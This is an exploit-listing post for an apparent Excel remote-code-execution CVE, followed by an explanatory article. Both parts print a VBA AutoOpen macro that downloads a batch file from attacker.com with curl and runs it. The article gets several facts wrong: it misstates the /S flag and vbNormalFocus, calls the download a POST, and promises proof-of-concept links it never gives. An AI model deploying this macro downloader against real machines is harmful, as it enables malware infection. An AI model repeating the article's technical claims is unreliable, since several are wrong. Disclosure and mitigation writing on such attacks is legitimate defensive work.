Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: Remote Language: VBA Published Date: 2023-07-03 
## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 06.27.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://portswigger.net/daily-swig/rce
## CVE-2023-33137


## Description:
This exploit is connected with third part exploit server, which waits
for the victim to call him and execute the content from him using the
pipe posting method! This is absolutely a 0-day exploit! This is
absolutely dangerous for the victims, who are infected by him!
When the victim hit the button in the Excel file, it makes a POST
request to the exploit server, and the server is responding back that
way: He creates another hidden malicious file and executed it directly
on the machine of the victim, then everything is disappeared, so
nasty.

STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!

[+]Exploit:
```vbs
Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat
> maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub

```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)

## Time spend:
01:27:00


CVE-2023-33137: A Critical Remote Code Execution Vulnerability in Microsoft 365 MSO (32-bit)

On June 27, 2023, cybersecurity researcher nu11secur1ty unveiled a highly dangerous zero-day exploit targeting Microsoft 365's Microsoft Office (MSO) suite—specifically version 2305 Build 16.0.16501.20074 for 32-bit systems. This vulnerability, assigned the identifier CVE-2023-33137, enables attackers to achieve remote code execution (RCE) through a malicious Excel file, exploiting a flaw in how embedded macros interact with external network resources.

Exploit Mechanism: The Hidden Pipeline Attack

The core of this exploit lies in a maliciously crafted Excel file that leverages the AutoOpen() event trigger—a built-in VBA macro that executes automatically when a document is opened. When a user opens the infected file, the macro initiates a HTTP POST request to a remote server controlled by the attacker.

This server acts as a third-party exploit delivery mechanism. Upon receiving the request, it responds by sending a payload: a malicious batch script (maloumnici.bat) which is downloaded and executed directly on the victim’s machine.

Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat > maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub

Explanation: This VBA code snippet triggers execution upon document opening. It uses Shell() to invoke the Windows command interpreter (cmd.exe) with the following commands:

  • curl -s: Downloads the malicious script from a remote server silently (without displaying output).
  • >: Redirects the output to a local file named maloumnici.bat.
  • && .\maloumnici.bat: Executes the downloaded script immediately after download.

The /S flag suppresses verbose output, making the attack stealthy. The use of vbNormalFocus ensures the command runs in a non-interactive window, avoiding user alerts.

Why This Is a 0-Day Threat

As of June 2023, Microsoft had not issued a patch for this vulnerability. The exploit was discovered and disclosed before the vendor acknowledged it, classifying it as a 0-day—a critical security flaw that is actively exploited in the wild.

Attackers can use this method to deliver payloads such as:

  • Backdoor malware (e.g., Remcos, Qakbot)
  • Keyloggers and credential stealers
  • Remote access trojans (RATs)
  • Self-propagating ransomware

Once executed, the malicious script can persist, disable security software, and exfiltrate sensitive data—often leaving no trace after execution.

Attack Surface and Targeting

This exploit primarily affects users running:

  • Microsoft 365 Excel (32-bit)
  • Version 2305 Build 16.0.16501.20074
  • Windows 10 and Windows 11 (especially older or unpatched systems)

It is particularly dangerous in environments where:

  • Users open unsolicited Excel files from email attachments
  • Office macros are enabled by default
  • Network restrictions are bypassed via outbound HTTP requests

Attackers can host the malicious script on cloud platforms like GitHub or Cloudflare, making it difficult to block with traditional firewall rules.

Proof of Concept and Reproduction

Researchers have published proof-of-concept files at:

These repositories contain the malicious Excel file and the corresponding server-side payload. The exploit has been tested successfully on unpatched systems, demonstrating full RCE capability.

Security Implications and Mitigation Strategies

Immediate Risk: This vulnerability is rated High Severity due to its ease of exploitation, stealthy nature, and potential for widespread compromise.

Recommended Mitigations:

Strategy Description
Disable Macro Execution Set Excel to disable macros by default via Group Policy or user settings. Use Trust Center settings to block all macros unless explicitly trusted.
Network Monitoring Deploy firewalls or EDR tools to detect outbound curl or cmd.exe commands with suspicious URLs.
Endpoint Protection Use advanced anti-malware solutions (e.g., Microsoft Defender, CrowdStrike) that can detect and block script execution from temporary files.
Regular Patching Ensure all Microsoft 365 installations are updated to the latest build. Monitor Microsoft Security Updates for CVE-2023-33137 patch release.

Expert Insight: The Evolution of Office-Based RCE

Historically, Office-based exploits have relied on document-level macros or OLE injection. This new variant represents a hybrid attack model: combining client-side scripting with server-side command delivery. It reflects the growing trend of cloud-based exploit delivery—where attackers use web infrastructure to dynamically serve payloads.

Security professionals must now consider:

  • How macros can be used to trigger network interactions without direct file execution.
  • The importance of behavioral analysis over static signatures.
  • The role of trusted domains in enabling malicious payloads.

Future defenses should focus on real-time monitoring of command-line execution patterns, especially those involving curl, PowerShell, or cmd.exe with external URLs.

Conclusion: A Wake-Up Call for Users and Organizations

CVE-2023-33137 is not just a technical flaw—it’s a real-world threat that can compromise systems with minimal user interaction. The ease of deployment, combined with the absence of patching at the time of disclosure, makes it a prime candidate for widespread abuse.

Organizations must act now: disable macros, monitor outbound traffic, and update software. For individual users, the rule remains simple: never open Excel files from untrusted sources. This exploit underscores the evolving sophistication of cyberattacks—and the need for constant vigilance.